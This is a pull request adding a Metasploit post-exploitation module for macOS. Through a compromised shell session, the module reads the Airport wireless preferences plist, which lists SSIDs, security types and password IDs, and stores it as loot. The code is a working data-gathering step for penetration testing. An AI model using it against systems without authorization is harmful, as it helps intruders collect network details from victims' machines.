### PR TITLE
Add OSX Gather Airport post module

### DIFF
--- a/modules/post/osx/gather/enum_airport.rb
+++ b/modules/post/osx/gather/enum_airport.rb
@@ -1,0 +1,74 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/post/common'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'          => 'OSX Gather Airport Wireless Preferences',
+			'Description'   => %q{
+					This module will download OSX Airport Wireless preferences from the victim
+				machine.  The preferences file (which is a plist) contains information such as:
+				SSID, Channels, Security Type, Password ID, etc.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'sinn3r'],
+			'Platform'      => [ 'osx' ],
+			'SessionTypes'  => [ "shell" ]
+		))
+	end
+
+	def exec(cmd)
+		begin
+			out = cmd_exec(cmd).chomp
+		rescue ::Timeout::Error => e
+			vprint_error("#{@peer} - #{e.message} - retrying...")
+			retry
+		rescue EOFError => e
+			vprint_error("#{@peer} - #{e.message} - retrying...")
+			retry
+		end
+	end
+
+
+	def get_air_preferences
+		pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
+		return pref =~ /No such file or directory/ ? nil : pref
+	end
+
+	def save(data)
+		p = store_loot(
+			"apple.airport.preferences",
+			"plain/text",
+			session,
+			data,
+			"com.apple.airport.preferences.plist")
+
+		print_good("#{@peer} - plist saved in #{p}")
+	end
+
+	def run
+		@peer = "#{session.session_host}:#{session.session_port}"
+
+		# Download the plist.  If not found (nil), then bail
+		pref = get_air_preferences
+		if pref.nil?
+			print_error("#{@peer} - Unable to find airport preferences")
+			return
+		end
+
+		# Save the raw version of the plist
+		save(pref)
+	end
+
+end

--- a/modules/post/osx/gather/enum_airport.rb
+++ b/modules/post/osx/gather/enum_airport.rb
@@ -7,7 +7,6 @@
 
 require 'msf/core'
 require 'msf/core/post/common'
-require 'rexml/document'
 
 class Metasploit3 < Msf::Post
 


### PR DESCRIPTION
Download the airport preferences file that contains information such as: SSID, Channels, Security Type, Password ID, etc.
